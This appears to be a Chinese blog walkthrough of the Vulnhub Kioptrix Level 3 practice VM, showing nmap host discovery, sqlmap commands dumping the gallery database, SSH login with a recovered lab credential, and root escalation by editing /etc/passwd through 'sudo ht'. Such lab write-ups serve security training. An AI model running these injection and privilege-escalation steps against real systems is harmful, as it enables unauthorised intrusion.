【Vulnhub靶场】Kioptrix Level 3

目标

本机IP:192.168.118.128

目标IP:192.168.118.0/24

信息收集

常规 nmap 扫存活主机,扫端口

根据靶机IP容易得出靶机IP为 192.168.118.133

复制代码
nmap -sP 192.168.118.0/24

nmap -p- 192.168.118.133

Getshell

开放22端口和80 端口

访问web页面

有一个login界面及一个超链接now

尝试点击,发现页面跳转到了kioptrix3.com ,结合靶机提示,应该是要绑定host

复制代码
vim /etc/hosts

访问 kioptrix3.com ,可以找到如下页面

初步探测,发现存在SQL注入漏洞

使用 sqlmap 跑一下

复制代码
sqlmap -u 'http://kioptrix3.com/gallery/gallery.php?id=1' --batch --current-db 

sqlmap -u 'http://kioptrix3.com/gallery/gallery.php?id=1' --batch -D 'gallery' --tables

最终得到两个账号密码

结合开始发现开放的 22 端口,尝试ssh登录,登录成功

复制代码
loneferret:starwars

ssh [email protected]

提权

查看当前权限

复制代码
sudo -l

查看loneferret用户家目录下文件,得到提示,使用sudo ht编辑文件

根据提示,执行命令,但是报错无法打开xterm-256coler.终端,输入以下命令解决

复制代码
export TERM=xterm

再次执行命令 sudo ht


按f3,打开文件,可以修改/etc/passwd,或/etc/sudoers

这里我将/etc/passwd中当前用户权限修改为root

按f2保存,ctrl+c退出

重新ssh登录查看,提权成功

相关推荐
搬码临时工14 分钟前
电脑怎么远程访问服务器?4种常见的简单方法
运维·服务器·网络·异地访问
QQ27402875626 分钟前
Kite AI 自动机器人部署教程
linux·运维·服务器·人工智能·机器人·web3
文牧之32 分钟前
PostgreSQL 配置设置函数
运维·数据库·postgresql
mooyuan天天32 分钟前
DVWA靶场通关笔记-SQL注入(SQL Injection Medium级别)
web安全·渗透测试·sql注入·sql注入漏洞·dvwa靶场
一口一个橘子1 小时前
[ctfshow web入门] web72
前端·web安全·网络安全
K龙2 小时前
私有资产测绘&安全流水线Shovel
运维·安全·开发·其它
程序猫A建仔2 小时前
【物联网】基于树莓派的物联网开发【4】——WIFI+SSH远程登录树莓派
运维·物联网·ssh
luck_me53 小时前
如何远程执行脚本不留痕迹
linux·运维·服务器
-SGlow-3 小时前
Linux相关概念和易错知识点(40)(HTML资源交互、网页管理、搜索引擎)
linux·运维·服务器·网络·html·交互
默心3 小时前
centos7部署mysql5.7
linux·运维·mysql·centos